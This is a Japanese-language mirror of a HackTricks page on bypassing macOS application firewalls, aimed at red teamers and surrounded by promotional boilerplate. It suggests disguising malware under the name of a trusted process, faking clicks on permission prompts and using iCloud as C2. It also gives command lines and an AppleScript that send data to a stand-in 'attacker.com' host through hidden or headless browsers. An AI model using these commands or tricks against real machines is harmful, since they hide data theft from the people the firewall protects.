mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 14:40:37 +00:00
5.4 KiB
5.4 KiB
macOS ファイアウォールのバイパス
htARTE(HackTricks AWS Red Team Expert) でAWSハッキングをゼロからヒーローまで学ぶ!
HackTricks をサポートする他の方法:
- HackTricks で企業を宣伝したいまたは HackTricks をPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
- 💬 Discordグループまたはtelegramグループに参加するか、Twitter 🐦 @carlospolopmでフォローする。
- ハッキングトリックを共有するには、PRを HackTricks および HackTricks Cloud のGitHubリポジトリに提出してください。
発見されたテクニック
以下のテクニックは、一部の macOS ファイアウォールアプリで機能することが確認されました。
ホワイトリスト名の悪用
- たとえば、マルウェアを
launchd
のようなよく知られた macOS プロセスの名前で呼び出す
シンセティッククリック
- ファイアウォールがユーザーに許可を求める場合、マルウェアに 許可をクリック させる
Apple 署名のバイナリの使用
curl
のようなものだけでなく、whois
なども
よく知られた Apple ドメイン
ファイアウォールは、apple.com
や icloud.com
のようなよく知られた Apple ドメインへの接続を許可している可能性があります。そして iCloud は C2 として使用されるかもしれません。
一般的なバイパス
ファイアウォールをバイパスしようとするいくつかのアイデア
許可されたトラフィックを確認する
許可されたトラフィックを知ることで、潜在的にホワイトリストに登録されているドメインやそれにアクセスできるアプリケーションを特定できます
lsof -i TCP -sTCP:ESTABLISHED
DNSの悪用
DNSの解決は、おそらくDNSサーバーに連絡を取ることが許可されるであろう**mdnsreponder
**署名済みアプリケーションを介して行われます。
ブラウザアプリを介して
- oascript
tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell
- Google Chrome
{% code overflow="wrap" %}
"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"
{% endcode %}
- Firefox
firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"
- Safari
open -j -a Safari "https://attacker.com?data=data%20to%20exfil"
プロセスインジェクションを介して
プロセスにコードをインジェクトできれば、任意のサーバーに接続を許可されているプロセスにコードをインジェクトすることでファイアウォールの保護をバイパスできます:
{% content-ref url="macos-proces-abuse/" %} macos-proces-abuse {% endcontent-ref %}
参考文献
htARTE(HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ htARTE(HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksで企業を宣伝したい、またはHackTricksをPDFでダウンロードしたい場合は、SUBSCRIPTION PLANSをチェックしてください!
- 公式PEASS&HackTricksスワッグを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションを見つける
- 💬 Discordグループに参加するか、telegramグループに参加するか、Twitter 🐦 @carlospolopmでフォロー**してください。
- HackTricksとHackTricks CloudのGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。